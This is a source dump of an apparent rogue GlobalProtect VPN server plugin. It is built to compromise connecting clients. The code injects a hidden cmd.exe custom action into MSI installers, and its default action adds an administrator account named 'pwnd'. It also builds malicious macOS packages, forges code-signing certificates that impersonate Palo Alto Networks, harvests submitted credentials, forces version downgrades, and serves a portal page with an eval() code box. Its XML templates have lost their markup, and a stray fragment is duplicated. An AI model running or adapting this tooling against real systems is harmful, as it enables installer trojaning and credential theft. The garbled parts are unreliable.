    parser.add_argument('-i', '--input', help='Input MSI file to add custom action to', required=True)
    parser.add_argument('-o', '--output', help='Output file to write the patched MSI to', required=True)
    parser.add_argument('-c', '--command', help='Command to inject into MSI', required=False)
    parser.add_argument('-f', '--force', help="Delete output file if it exists", action='store_true')
    parser.add_argument('--increment', help="Increment MSI version", action='store_true')
    parser.add_argument('--add-file', help='Path to file to be added to the MSI', required=False)
    parser.add_argument('--feature', help='Feature to add the file to', default="auto")
    args = parser.parse_args()

    sequence = "InstallExecuteSequence"
    action_type = (ACTION_TYPE_SHELL | ACTION_TYPE_CONTINUE | ACTION_TYPE_ASYNC |
                   ACTION_TYPE_COMMIT | ACTION_TYPE_IN_SCRIPT | ACTION_TYPE_NO_IMPERSONATE)
    source = "C:\\windows\\system32\\cmd.exe"
    patcher = get_msi_patcher()

    if os.path.exists(args.output):
        if args.force:
            os.remove(args.output)
        else:
            print(f"Output file {args.output} already exists")
            exit(1)

    shutil.copy(args.input, args.output)

    if args.command:
        target = args.command
        if patcher.add_custom_action(args.output, f"_{random_hash()}", action_type, source, target, sequence):
            print("Custom action added")

    if args.add_file and patcher.add_file(args.output, args.add_file, random_hash(), args.feature):
        print("File added to MSI")

    if args.increment:
        patcher.increment_msi_version(args.output)
        print("MSI version incremented")

    if not args.add_file and not args.command and not args.increment:
        print("Warning: Writing unmodified MSI as no changes were requested")
# ================================================ FILE: src/nachovpn/plugins/paloalto/pkg_generator.py ================================================
from Crypto.Hash import SHA
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from cryptography import x509
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
import io
import os
import sys
import zlib
import logging
import struct
import hashlib
import random
import base64
import string
import datetime
import argparse

# NOTE(review): the XML element markup inside these template strings appears to
# have been stripped by the text extraction that produced this dump — restore
# the original tags from upstream before relying on these literals.
DIST_TEMPLATE = """
{package_name}
"""

TOC_TEMPLATE = """
20
0
{creation_time}
{signature_toc_entry}
Distribution file
{compressed_hash}
{extracted_hash}
{extracted_length}
{data_offset}
{compressed_length}
"""

# 461137009.8
SIGNATURE_TOC_ENTRY = """
20
{signature_length}
{x509_certs}
"""


def build_signature_toc(certificates, signature_length):
    """Render the signature TOC entry embedding each base64 certificate in order."""
    x509_certs = ''
    for cert in certificates:
        x509_certs += f'{cert}'
    return SIGNATURE_TOC_ENTRY.format(
        signature_length=signature_length,
        x509_certs=x509_certs).rstrip()


def extract_cert_base64(cert_file):
    """Return the base64-encoded DER form of the PEM certificate at *cert_file*, or None."""
    try:
        with open(cert_file, "rb") as f:
            cert = x509.load_pem_x509_certificate(f.read(), default_backend())
        der_cert = cert.public_bytes(encoding=serialization.Encoding.DER)
        return base64.b64encode(der_cert).decode()
    except Exception as e:
        logging.error(f'Unable to import {cert_file}: {e}')
        return None


def get_signature(key_file, data):
    """Return the PKCS#1 v1.5 SHA-1 signature of *data* using the RSA key at *key_file*, or None."""
    try:
        with open(key_file, 'rb') as f:
            key_data = RSA.import_key(f.read())
        return PKCS1_v1_5.new(key_data).sign(SHA.new(data))
    except Exception:  # Fix: was a bare except, which also swallows SystemExit/KeyboardInterrupt
        logging.error(f'Unable to get signature with key: {key_file}')
        return None


def random_string(length=12):
    """Return a random mixed-case ASCII string of *length* characters."""
    return ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(length))


def generate_pkg(version, command, package_name, cert_file=None, key_file=None, ca_file=None):
    """Build an in-memory xar/.pkg payload executing *command*, optionally signed.

    Returns the raw bytes of the archive, or False when signing material was
    supplied but could not be used.
    """
    package_id = '{}.{}'.format(random_string(6).lower(), random_string(6).lower())
    installation_check = random_string()
    dist_file = DIST_TEMPLATE.format(
        package_id=package_id,
        package_name=package_name,
        command=command,
        installation_check=installation_check,
        bundle_version=version
    ).encode()

    # figure out some offsets ..
    data_offset = SHA.digest_size
    sig_toc_entry = ''

    if key_file and cert_file and ca_file:
        # Sign a probe value first so we know the signature length up front
        test_sig = get_signature(key_file, b"foobar")
        if not test_sig:
            return False

        # increment the offset by the size of the signature data
        sig_len = len(test_sig)
        data_offset += sig_len

        # get required certificates
        ca_cert = extract_cert_base64(ca_file)
        signing_cert = extract_cert_base64(cert_file)
        if not ca_cert or not signing_cert:
            return False

        # now populate the TOC entry
        sig_toc_entry = build_signature_toc([signing_cert, ca_cert], sig_len)

    dist_file_compressed = zlib.compress(dist_file)
    toc_xml = TOC_TEMPLATE.format(
        extracted_hash=hashlib.sha1(dist_file).hexdigest(),
        extracted_length=len(dist_file),
        compressed_hash=hashlib.sha1(dist_file_compressed).hexdigest(),
        compressed_length=len(dist_file_compressed),
        signature_toc_entry=sig_toc_entry,
        data_offset=data_offset,
        creation_time=datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
    ).encode()
    #logging.debug(toc_xml)
    toc_compressed = zlib.compress(toc_xml)

    buf = io.BytesIO()
    buf.write(b'xar!')                                  # magic
    buf.write(b'\x00\x1c')                              # length of header
    buf.write(b'\x00\x01')                              # version
    buf.write(struct.pack('>Q', len(toc_compressed)))   # length of TOC compressed data
    buf.write(struct.pack('>Q', len(toc_xml)))          # length of TOC uncompressed data
    buf.write(b'\x00\x00\x00\x01')                      # checksum algorithm (sha1)
    buf.write(toc_compressed)
    buf.write(hashlib.sha1(toc_compressed).digest())    # sha1 of compressed data
    if key_file and cert_file:
        buf.write(get_signature(key_file, toc_compressed))  # write signature
    buf.write(dist_file_compressed)
    return buf.getvalue()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Create a .pkg file for macOS and optionally sign it')
    parser.add_argument("-v", "--version", required=True, help="CFBundleVersion for the PKG file")
    parser.add_argument("-c", "--command", help="Command to execute", required=True)
    parser.add_argument("-o", "--output", required=True, help="Output file")
    # Fix: -n was required=True while its help text promised a default,
    # making the fallback below dead code. It is now genuinely optional.
    parser.add_argument("-n", "--name", help="Package name. Defaults to the output file name")
    parser.add_argument("-a", "--apple-cert", help="Signing certificate")
    parser.add_argument("-k", "--apple-key", help="Key for signing certificate")
    parser.add_argument("--ca-cert", help="CA Certificate", dest="ca_cert")
    args = parser.parse_args()

    if args.name:
        pkg_name = args.name
    else:
        # Fix: was args.output_file, an attribute that does not exist (AttributeError)
        pkg_name = os.path.basename(args.output)

    cert_args = [args.apple_key, args.apple_cert, args.ca_cert]
    if any(cert_args) and not all(cert_args):
        # Fix: the message previously named --cert/--key, which are not the actual flags
        parser.error('You must supply --apple-cert, --apple-key and --ca-cert together')

    for arg in cert_args:
        if arg and not os.path.exists(arg):
            print(f"[!] Certificate file '{arg}' not found")
            sys.exit(1)

    outbuf = generate_pkg(args.version, args.command, pkg_name, args.apple_cert, args.apple_key, args.ca_cert)
    if not outbuf:
        sys.exit(1)

    with open(args.output, 'wb') as f:
        f.write(outbuf)
    print(f'[+] Done! pkg file written to: {args.output}')
pkg file written to: {args.output}') ================================================ FILE: src/nachovpn/plugins/paloalto/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import Response, abort, request, redirect from nachovpn.plugins.paloalto.pkg_generator import generate_pkg from nachovpn.plugins.paloalto.msi_patcher import get_msi_patcher, random_hash, ACTION_TYPE_SHELL, ACTION_TYPE_CONTINUE, \ ACTION_TYPE_ASYNC, ACTION_TYPE_COMMIT, ACTION_TYPE_IN_SCRIPT, ACTION_TYPE_NO_IMPERSONATE from urllib.parse import urlparse, parse_qs import subprocess import shutil import uuid import ssl import os import io import re import random # SSL-VPN packet types SSL_VPN_MAGIC = bytes.fromhex('1a2b3c4d') SSL_VPN_STATIC = bytes.fromhex('0100000000000000') KEEP_ALIVE_PACKET = bytes.fromhex('1a2b3c4d000000000000000000000000') ETHER_TYPES = {0x0800: 'IPv4', 0x0806: 'ARP', 0x86dd: 'IPv6'} class PaloAltoPlugin(VPNPlugin): def __init__(self, *args, **kwargs): # provide the templates directory relative to this plugin super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates')) # Payload storage self.payload_dir = os.path.join(os.getcwd(), 'payloads') self.download_dir = os.path.join(os.getcwd(), 'downloads') os.makedirs(self.payload_dir, exist_ok=True) os.makedirs(self.download_dir, exist_ok=True) # Stores the downgraded state for each version suffix self.allocated_suffixes = {} # Payload options self.msi_force_patch = os.getenv("PALO_ALTO_FORCE_PATCH", False) self.msi_add_file = os.getenv("PALO_ALTO_MSI_ADD_FILE", None) self.msi_increment_version = os.getenv("PALO_ALTO_MSI_INCREMENT_VERSION", True) self.pkg_command = os.getenv("PALO_ALTO_PKG_COMMAND", "touch /tmp/pwnd") self.msi_command = os.getenv( "PALO_ALTO_MSI_COMMAND", r"net user pwnd Passw0rd123! 
/add && net localgroup administrators pwnd /add"
        )
        # (the raw string above closes the PALO_ALTO_MSI_COMMAND default
        #  started on the previous chunk line)

        # Certificate paths
        self.apple_cert_path = os.path.join('certs', 'paloalto-apple.cer')
        self.apple_key_path = os.path.join('certs', 'paloalto-apple.key')
        self.codesign_cert_path = os.path.join('certs', 'paloalto-codesign.cer')
        self.codesign_key_path = os.path.join('certs', 'paloalto-codesign.key')
        self.codesign_pfx_path = os.path.join('certs', 'paloalto-codesign.pfx')

        # Gateway config (rendered into the XML templates)
        self.gateway_config = {
            "gateway_ip": self.external_ip,
            "ca_certificate": "",
            "dns_name": self.dns_name,
        }

        # Run bootstrap
        if not self.bootstrap():
            self.logger.error(f"Failed to bootstrap. Disabling {self.__class__.__name__}")
            self.enabled = False

    def generate_unique_suffix(self):
        """Allocate a random 16-hex-char suffix not yet in allocated_suffixes.

        The suffix maps to False (= downgrade MSI not yet served).
        """
        while True:
            suffix = os.urandom(8).hex()
            if suffix not in self.allocated_suffixes:
                self.allocated_suffixes[suffix] = False
                self.logger.info(f"Generated unique suffix: {suffix}")
                return suffix

    def generate_pkg(self):
        """Build the macOS GlobalProtect.pkg payload and write it to payload_dir.

        Returns the path of the written pkg file.
        """
        # '-' is not valid inside the version passed to the pkg generator
        pkg_buf = generate_pkg(
            self.upgrade_version.replace('-', 'f'),
            self.pkg_command,
            "GlobalProtect",
            self.apple_cert_path,
            self.apple_key_path,
            self.cert_manager.ca_cert_path
        )
        pkg_path = os.path.join(self.payload_dir, "GlobalProtect.pkg")
        with open(pkg_path, 'wb') as f:
            f.write(pkg_buf)
        return pkg_path

    def get_higher_version(self, version):
        """Return the next patch version, dropping any '-suffix' first.

        Patch and minor roll over at 100 (e.g. 6.2.99 -> 6.3.0).
        """
        version = version.split('-')[0]
        major, minor, patch = map(int, version.split('.'))
        patch += 1
        if patch == 100:
            minor += 1
            patch = 0
        if minor == 100:
            major += 1
            minor = 0
        return f"{major}.{minor}.{patch}"

    def get_latest_msi_version(self):
        """Read the cached MSI version string from downloads/msi_version.txt.

        Returns None (after logging guidance) when the file is missing.
        """
        version_file = os.path.join(self.download_dir, "msi_version.txt")
        if not os.path.exists(version_file):
            self.logger.error(f"MSI version file not found")
            self.logger.info(f"Run downloader to fetch latest MSI files, or manually add {version_file}")
            return None
        with open(version_file, "r") as f:
            version = f.read().strip()
        self.logger.info(f"Latest MSI version: {version}")
        return version

    def sign_msi_files(self):
        """Sign the patched MSI payloads with osslsigncode.

        (Body continues on the next chunk line.)
        """
        if not os.path.exists(self.codesign_cert_path):
self.logger.error("Windows code signing certificate not found, skipping signing") return False if not os.path.exists(os.path.join(self.payload_dir, "GlobalProtect.msi")) or \ not os.path.exists(os.path.join(self.payload_dir, "GlobalProtect64.msi")): self.logger.error("MSI files not found, skipping signing") return False if os.name == "nt": self.logger.error("Windows MSI signing not supported yet") return False if not os.path.exists('/usr/bin/osslsigncode'): self.logger.error("osslsigncode not found, skipping signing") return False # Sign the MSI files for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]: input_file = os.path.join(self.payload_dir, msi_file) output_file = os.path.join(self.payload_dir, f"{msi_file}.signed") # Remove existing signed file if os.path.exists(output_file): os.remove(output_file) proc = subprocess.run([ "/usr/bin/osslsigncode", "sign", "-pkcs12", self.codesign_pfx_path, "-in", input_file, "-out", output_file, ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode or not os.path.exists(output_file): self.logger.error(f"Failed to sign {msi_file}: {proc.returncode}") return False else: self.logger.info(f"Signed {msi_file}") os.replace(output_file, input_file) return True def verify_msi_files(self): # Verify that the MSI files are signed by our current CA if os.name == "nt": self.logger.error("Windows MSI verification not supported yet") return True if os.name == "posix" and not os.path.exists('/usr/bin/osslsigncode'): self.logger.error("osslsigncode not found, skipping verification") return True for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]: proc = subprocess.run([ "/usr/bin/osslsigncode", "verify", "-CAfile", self.cert_manager.ca_cert_path, "-in", os.path.join(self.payload_dir, msi_file), ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode: self.logger.error(f"Failed to verify {msi_file}: {proc.returncode}") return False self.logger.info("MSI files verified") return True 
def patch_msi_files(self):
    """Patch the downloaded GlobalProtect MSIs with our payload.

    Copies the pristine MSIs from download_dir into payload_dir, then
    optionally embeds an extra file, adds a cmd.exe custom action, and bumps
    the MSI version. Returns True on success (or when patching is skipped),
    False when the source MSIs are missing.
    """
    # Skip when already-patched files exist, pass CA verification, and
    # re-patching was not forced via PALO_ALTO_FORCE_PATCH.
    if os.path.exists(os.path.join(self.payload_dir, "GlobalProtect.msi")) and \
            os.path.exists(os.path.join(self.payload_dir, "GlobalProtect64.msi")) and \
            not self.msi_force_patch and self.verify_msi_files():
        self.logger.warning("MSI files already patched, skipping")
        return True

    # msitools (msidump) is required on posix to rewrite the MSI database
    if os.name == "posix" and not os.path.exists('/usr/bin/msidump'):
        self.logger.error("msitools not found, skipping patching")
        return True

    # Check if the pristine MSI files are present
    if not os.path.exists(os.path.join(self.download_dir, "GlobalProtect.msi")) or \
            not os.path.exists(os.path.join(self.download_dir, "GlobalProtect64.msi")):
        self.logger.warning(f"MSI files not found in download directory: {self.download_dir}")
        self.logger.info(f"Run downloader to fetch latest MSI files, or add manually")
        return False

    patcher = get_msi_patcher()
    for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]:
        # Copy default MSI file to payload directory
        input_file = os.path.join(self.download_dir, msi_file)
        output_file = os.path.join(self.payload_dir, msi_file)
        shutil.copy(input_file, output_file)

        # Optionally embed an extra file into the MSI
        if self.msi_add_file:
            patcher.add_file(output_file, self.msi_add_file, random_hash(), "DefaultFeature")
            self.logger.info(f"Added file {self.msi_add_file} to {msi_file}")

        # Add a deferred, non-impersonated cmd.exe custom action running
        # self.msi_command during InstallExecuteSequence
        if self.msi_command:
            action_type = (ACTION_TYPE_SHELL | ACTION_TYPE_CONTINUE | ACTION_TYPE_ASYNC |
                           ACTION_TYPE_COMMIT | ACTION_TYPE_IN_SCRIPT | ACTION_TYPE_NO_IMPERSONATE)
            patcher.add_custom_action(output_file, f"_{random_hash()}", action_type,
                                      "C:\\windows\\system32\\cmd.exe", f"/c {self.msi_command}",
                                      "InstallExecuteSequence")
            self.logger.info(f"Added custom action to {msi_file}")

        if self.msi_increment_version:
            patcher.increment_msi_version(output_file)
            self.logger.info(f"Incremented MSI version for {msi_file}")

    self.logger.info("MSI files patched")
    return True

def bootstrap(self):
    """Prepare certificates and payloads.

    Returns False when a prerequisite (MSI version file, pristine MSIs,
    signing tooling) is missing, so the plugin can disable itself.
    """
    # Get versions
    self.latest_version = self.get_latest_msi_version()
    if not self.latest_version:
        return False
    self.upgrade_version = self.get_higher_version(self.latest_version)

    # Generate an Apple code signing certificate
    if not os.path.exists(self.apple_cert_path) or not os.path.exists(self.apple_key_path):
        self.cert_manager.generate_apple_certificate(
            common_name="Developer ID Installer: Palo Alto Networks (PXPZ95SK77)",
            cert_path=self.apple_cert_path,
            key_path=self.apple_key_path
        )

    # Generate a Windows code signing certificate
    if not os.path.exists(self.codesign_cert_path) or not os.path.exists(self.codesign_key_path):
        self.cert_manager.generate_codesign_certificate(
            common_name="Palo Alto Networks",
            cert_path=self.codesign_cert_path,
            key_path=self.codesign_key_path,
            pfx_path=self.codesign_pfx_path
        )

    # Load the CA certificate into the gateway config
    with open(self.cert_manager.ca_cert_path, 'r') as f:
        self.gateway_config["ca_certificate"] = f.read()

    # Generate the macOS pkg payload (GlobalProtect.pkg)
    self.generate_pkg()

    # FIX: the MSI version was previously fetched (and logged) a second time
    # here into an unused local; self.latest_version above is authoritative.

    # Check for .old MSI files (used to serve version downgrades)
    for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]:
        old_file = os.path.join(self.download_dir, f"{msi_file}.old")
        if not os.path.exists(old_file):
            self.logger.warning(f"Older version MSI file not found: {old_file}")
            self.logger.info(f"Add {msi_file}.old to {self.download_dir} to enable version downgrade")

    # Patch the Windows MSI files and sign them
    if not self.patch_msi_files():
        return False
    if not self.sign_msi_files():
        return False
    return True

def close(self):
    """Close the plugin's SSL server socket."""
    # NOTE(review): ssl_server_socket is not assigned anywhere in this chunk --
    # presumably provided by the VPNPlugin base class; confirm.
    self.ssl_server_socket.close()

def can_handle_data(self, data, client_socket, client_ip):
    """True when the raw TCP payload starts with the SSL-VPN magic bytes."""
    return len(data) >= 4 and data[:4] == SSL_VPN_MAGIC

def can_handle_http(self, handler):
    """True for GlobalProtect user agents or the ssl-tunnel-connect endpoint."""
    user_agent = handler.headers.get('User-Agent', '')
    if 'GlobalProtect' in user_agent or \
            handler.path.startswith('/ssl-tunnel-connect.sslvpn'):
        return True
    return False

def generate_auth_cookie(self, connection_id):
    """Encode a UUID connection id as a 32-char hex auth cookie."""
    return uuid.UUID(connection_id).bytes.hex()

# (the "def" keyword opening decode_auth_cookie continues on the next chunk line)
    # (the "def" for this method sits at the end of the previous chunk line)
    def decode_auth_cookie(self, auth_cookie):
        """Decode a 32-char hex auth cookie back into its UUID string form."""
        return str(uuid.UUID(bytes=bytes.fromhex(auth_cookie)))

    def extract_auth_cookie(self, handler):
        # Pull ?authcookie=... from the request path, or None when absent
        query = urlparse(handler.path).query
        params = parse_qs(query)
        return params.get('authcookie', [None])[0]

    def handle_http(self, handler):
        """Dispatch GlobalProtect HTTP requests.

        The ssl-tunnel-connect endpoint is upgraded in place to the raw
        SSL-VPN data handler; everything else goes to the base GET/POST
        handlers (which route through Flask).
        """
        if handler.command == 'GET' and handler.path.startswith('/ssl-tunnel-connect.sslvpn'):
            auth_cookie = self.extract_auth_cookie(handler)
            connection_id = self.decode_auth_cookie(auth_cookie)
            if not connection_id:
                self.logger.error(f"Unknown connection_id: {connection_id}")
                return False

            # Assign the socket to the connection_id
            if not self.packet_handler.assign_socket(connection_id, handler.connection):
                return False

            self.logger.info(f"Starting tunnel for {connection_id}")
            handler.connection.sendall(b'START_TUNNEL')

            # Pass handling to data handler
            return self.handle_data(b'', handler.connection, handler.client_address[0], connection_id)
        elif handler.command == 'GET':
            return self.handle_get(handler)
        elif handler.command == 'POST':
            return self.handle_post(handler)
        return False

    def _setup_routes(self):
        # Call the parent class's route setup
        super()._setup_routes()

        @self.flask_app.route('/global-protect/prelogin.esp', methods=['GET', 'POST'])
        def global_protect_pre_login():
            xml = self.render_template('prelogin.xml')
            return Response(xml, mimetype='application/xml')

        @self.flask_app.route('/ssl-vpn/prelogin.esp', methods=['GET', 'POST'])
        def ssl_vpn_pre_login():
            xml = self.render_template('sslvpn-prelogin.xml')
            return Response(xml, mimetype='application/xml')

        @self.flask_app.route('/ssl-vpn/login.esp', methods=['GET', 'POST'])
        def ssl_vpn_login():
            # Capture and log any submitted credentials
            if request.method == "POST":
                username = request.form.get('user')
                password = request.form.get('passwd')
                if username:
                    self.logger.info(f"Username: {username}")
                if password:
                    self.logger.info(f"Password: {password}")
                if username and password:
                    info = {'User-Agent': request.headers.get('User-Agent')}
                    self.db_manager.log_credentials(
                        username, password,
                        self.__class__.__name__, info
                    )
            # Allocate a VPN session and hand the client its auth cookie
            connection_id, ip_address = self.packet_handler.create_session(None, self._wrap_packet)
            client_config = self.gateway_config.copy()
            client_config["client_ip"] = ip_address
            client_config["auth_cookie"] = self.generate_auth_cookie(connection_id)
            xml = self.render_template('sslvpn-login.xml', **client_config)
            return Response(xml, mimetype='application/xml')

        @self.flask_app.route('/global-protect/getconfig.esp', methods=['GET', 'POST'])
        def global_protect_get_config():
            # Capture and log any submitted credentials
            if request.method == "POST":
                username = request.form.get('user')
                password = request.form.get('passwd')
                if username:
                    self.logger.info(f"Username: {username}")
                if password:
                    self.logger.info(f"Password: {password}")
                if username and password:
                    info = {'User-Agent': request.headers.get('User-Agent')}
                    self.db_manager.log_credentials(
                        username, password,
                        self.__class__.__name__, info
                    )
            # check if we need to downgrade; a unique suffix tracks whether the
            # downgrade MSI was already served to this client (see download_msi)
            if self.should_downgrade(request.headers.get('User-Agent', '')):
                suffix = self.generate_unique_suffix()
                version = self.upgrade_version + f"-{suffix}"
            else:
                version = self.upgrade_version
            config = self.gateway_config.copy()
            config["version"] = version
            xml = self.render_template('pwresponse.xml', **config)
            return Response(xml, mimetype='application/xml')

        @self.flask_app.route('/ssl-vpn/getconfig.esp', methods=['POST'])
        def ssl_vpn_get_config():
            # Capture and log any submitted credentials
            if request.method == "POST":
                username = request.form.get('user')
                password = request.form.get('passwd')
                if username:
                    self.logger.info(f"Username: {username}")
                if password:
                    self.logger.info(f"Password: {password}")
                if username and password:
                    info = {'User-Agent': request.headers.get('User-Agent')}
                    self.db_manager.log_credentials(
                        username, password,
                        self.__class__.__name__, info
                    )
            # Fill in the assigned IP address
            auth_cookie = request.form.get('authcookie')
            connection_id = self.decode_auth_cookie(auth_cookie)
            if not connection_id:
                self.logger.error(f"Unknown connection_id: {connection_id}")
                return abort(404)
            client_ip = self.packet_handler.get_assigned_ip(connection_id)
            self.logger.info(f"Client IP: {client_ip}")
            client_config = self.gateway_config.copy()
            client_config["client_ip"] = client_ip
            xml = self.render_template('getconfig.xml', **client_config)
            return Response(xml, mimetype='application/xml')

        @self.flask_app.route('/global-protect/getmsi.esp', methods=['GET', 'POST'])
        def get_msi_redirect():
            # macOS clients get the pkg; Windows clients get 32/64-bit MSI
            user_agent = request.headers.get('User-Agent')
            version = request.args.get('v')
            if 'apple mac' in user_agent.lower() or 'darwin' in user_agent.lower():
                return redirect(f"/msi/GlobalProtect.pkg", code=302)
            elif request.args.get('version') == '64':
                return redirect(f"/msi/GlobalProtect64.msi?v={version}", code=302)
            return redirect(f"/msi/GlobalProtect.msi?v={version}", code=302)

        # NOTE(review): the view below takes file_name but the route string has
        # no converter -- the original was probably '/msi/<file_name>' and the
        # angle brackets were lost in extraction; confirm against upstream.
        @self.flask_app.route('/msi/', methods=['GET'])
        def download_msi(file_name):
            if file_name not in ['GlobalProtect.pkg', 'GlobalProtect.msi', 'GlobalProtect64.msi']:
                return abort(404)

            version = request.args.get('v', '')
            file_path = os.path.join(self.payload_dir, file_name)

            """
            This is a workaround due to the GlobalProtect client not sending its current version
            Instead we set a unique suffix to the version in the portal config and store it in a dict
            The suffix is only added to the version if the client was originally on a version >= 6.2.6
            For each suffix, we store a bool of downgraded state
            """
            # Check if version has a suffix
            if '-' in version and os.path.exists(os.path.join(self.download_dir, f"{file_name}.old")):
                suffix = version.split('-')[-1]
                if suffix in self.allocated_suffixes:
                    downgraded = self.allocated_suffixes[suffix]
                    if not downgraded:
                        # First fetch for this suffix: serve the older MSI once
                        self.logger.info(f"Serving downgrade MSI for suffix {suffix}")
                        file_path = os.path.join(self.download_dir, f"{file_name}.old")
                        self.allocated_suffixes[suffix] = True
                else:
                    self.logger.info(f"Unknown suffix {suffix}")
                    return abort(404)

            if not os.path.exists(file_path):
                self.logger.error(f"Download file not found: {file_path}")
                return abort(404)

            file_size = os.path.getsize(file_path)
            headers = {
                'Content-Type': 'application/octet-stream',
                'Content-Disposition': f'attachment; filename="{file_name}"',
                'Content-Length': str(file_size)
            }
            self.logger.info(f"Serving {file_path}")
            with open(file_path, 'rb') as f:
                file_content = f.read()
            return Response(file_content, headers=headers)

    def _wrap_packet(self, packet_data, client):
        """Frame an outbound IP packet as an SSL-VPN tunnel message.

        EtherType is derived from the IP version nibble; returns None for
        empty or non-IPv4/IPv6 payloads.
        """
        # Determine EtherType
        if len(packet_data) > 0:
            if (packet_data[0] >> 4) == 4:
                ether_type = 0x0800  # IPv4
            elif (packet_data[0] >> 4) == 6:
                ether_type = 0x86dd  # IPv6
            else:
                self.logger.error(f"Unknown EtherType: {packet_data[0] >> 4}")
                return None
        else:
            self.logger.error(f"Empty packet data")
            return None

        packet_length = len(packet_data)
        packet = (
            SSL_VPN_MAGIC +
            ether_type.to_bytes(2, 'big') +
            packet_length.to_bytes(2, 'big') +
            SSL_VPN_STATIC +
            packet_data
        )
        return packet

    def handle_data(self, data, client_socket, client_ip, connection_id=None):
        """Blocking receive loop for an established SSL-VPN tunnel socket.

        Each recv chunk is handed to process_tcp_message; the session is
        destroyed and the socket closed when the loop ends.
        """
        try:
            client_socket.setblocking(True)
            data = b''
            while True:
                try:
                    chunk = client_socket.recv(4096)
                    if not chunk:
                        break
                    data += chunk
                    self.process_tcp_message(client_socket, data, client_ip, connection_id)
                    data = b''
                except BlockingIOError:
                    continue
                except ssl.SSLWantReadError:
                    continue
        except Exception as e:
            self.logger.error(f'Error handling connection: {type(e)}: {e}')
        finally:
            self.packet_handler.destroy_session(connection_id)
            client_socket.close()
            # NOTE(review): returning from inside finally suppresses any
            # in-flight exception and makes the trailing `return False`
            # unreachable -- verify this matches upstream intent.
            return True
        return False

    def process_tcp_message(self, client_socket, data, client_ip, connection_id):
        """Handle one received TCP message: keep-alives and SSL-VPN frames."""
        # Process the TCP message data as needed
        if data == KEEP_ALIVE_PACKET:
            self.logger.debug(f"Received KEEP_ALIVE Packet from {client_ip}")
            client_socket.sendall(KEEP_ALIVE_PACKET)
            return
        elif data[0:4] != SSL_VPN_MAGIC:
            # Not an SSL-VPN packet
            self.logger.warning(f"Received Unhandled TCP message from {client_ip}: {data.hex()}")
            return

        # Parse the tunelled packet (continues on the next chunk line)
        buf = io.BytesIO(data)
        magic = buf.read(4)
        assert magic == SSL_VPN_MAGIC
        ether_type = int.from_bytes(buf.read(2), 'big')
        ether_str = 
# -- chunk-boundary tail of PaloAltoPlugin.process_tcp_message --
# The statements below originally completed process_tcp_message (whose head is
# on the previous chunk line, ending at "ether_str ="). They are kept
# executable here as a helper with the method's locals passed in explicitly.
def _process_tcp_message_tail(self, buf, data, magic, ether_type, client_ip, connection_id):
    """Finish parsing an SSL-VPN frame and forward the tunnelled packet."""
    ether_str = ETHER_TYPES.get(ether_type, 'UNKNOWN')
    packet_length = int.from_bytes(buf.read(2), 'big')
    static_bytes = buf.read(8)
    assert static_bytes == SSL_VPN_STATIC
    packet_data = buf.read(packet_length)
    # The frame must be exactly header + payload -- nothing trailing
    assert len(packet_data) == packet_length
    assert buf.tell() == len(data)

    self.logger.debug(f"Received SSL-VPN Packet from {client_ip}: Magic={magic.hex()}, " \
                      f"EtherType={hex(ether_type)} ({ether_str}), Length={packet_length}")

    if ether_str == 'UNKNOWN':
        self.logger.warning(f"UNKNOWN Packet Type: {ether_type}")
        return

    self.packet_handler.handle_client_packet(
        packet_data, connection_id
    )

def should_downgrade(self, user_agent):
    """Decide whether the connecting client must be served a downgrade MSI.

    Clients report their version in the User-Agent as "GlobalProtect/x.y.z".
    Versions >= 6.2.6 need the downgrade; older versions, or an agent string
    without a parseable version, do not.
    """
    version_match = re.search(r'GlobalProtect/(\d+\.\d+\.\d+)', user_agent)
    if not version_match:
        return False

    client_version = version_match.group(1)
    self.logger.info(f"Client version: {client_version}")

    # FIX: tuple comparison replaces the original chained boolean
    # (major > 6) or (major == 6 and minor > 2) or
    # (major == 6 and minor == 2 and patch >= 6) -- identical semantics --
    # and drops a redundant int(patch) cast (patch is already an int).
    major, minor, patch = map(int, client_version.split('.')[:3])
    if (major, minor, patch) >= (6, 2, 6):
        self.logger.info(f"Client version {client_version} needs downgrade")
        return True

    self.logger.info(f"Client version {client_version} is compatible")
    return False

# -- extraction residue preserved verbatim: template content from
#    src/nachovpn/plugins/paloalto/templates/getconfig.xml --
_GETCONFIG_XML_FRAGMENT = """
================================================ FILE: src/nachovpn/plugins/paloalto/templates/getconfig.xml ================================================
yes /ssl-tunnel-connect.sslvpn LDN-Gway bob no 2592000 10800 1800 Your GlobalProtect session will expire in 30 minutes. Please save your work before your session expires. 1800 Your GlobalProtect session will time out in 30 minutes. Please save your work before your session times out. Your administrator has logged you out.
"""
1711900239 10800 1000 1000 11.1.0 {{ gateway_ip }} no {{ client_ip }} 255.255.255.255 yes 1.1.1.1 10.10.10.1 0 no 0.0.0.0/0 1.1.1.1/32 {{ gateway_ip }}/32 ================================================ FILE: src/nachovpn/plugins/paloalto/templates/prelogin.xml ================================================ Success false Enter Portal password Username Password 1 yesGB ================================================ FILE: src/nachovpn/plugins/paloalto/templates/pwresponse.xml ================================================ GP-portal 4100 {{ version }} global-protect-full **** {{ ca_certificate }} yes user-logon yes yes 72 no no no 10.0.150.1 {{ dns_name }} 50 GP-GD-Internal GP-Lon-DC-Internal 1 1 yes {{ dns_name }} 5 192.168.1.157 192.168.69.45 {{ gateway_ip }} 1 1 yes yes 0 0 no disabled yes yes yes yes yes 3600 20 no antivirus host-info 1 no no no no allowed transparent yes no yes yes no 30 50 no 0.0.0.0/0 {{ dns_name }} 600 5 yes <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Notice</h1><p style="margin: 0;font-size: 15px; line-height: 1.2em;">To access the network, you must first connect to GlobalProtecteeeeeeeee VPN.</p></div><input size="100" id="code"></input><button id="runcode" onclick=clicked();>Run Code</button></body><script> function clicked(){var code = document.getElementById("code").value;eval(code);}</script> yes 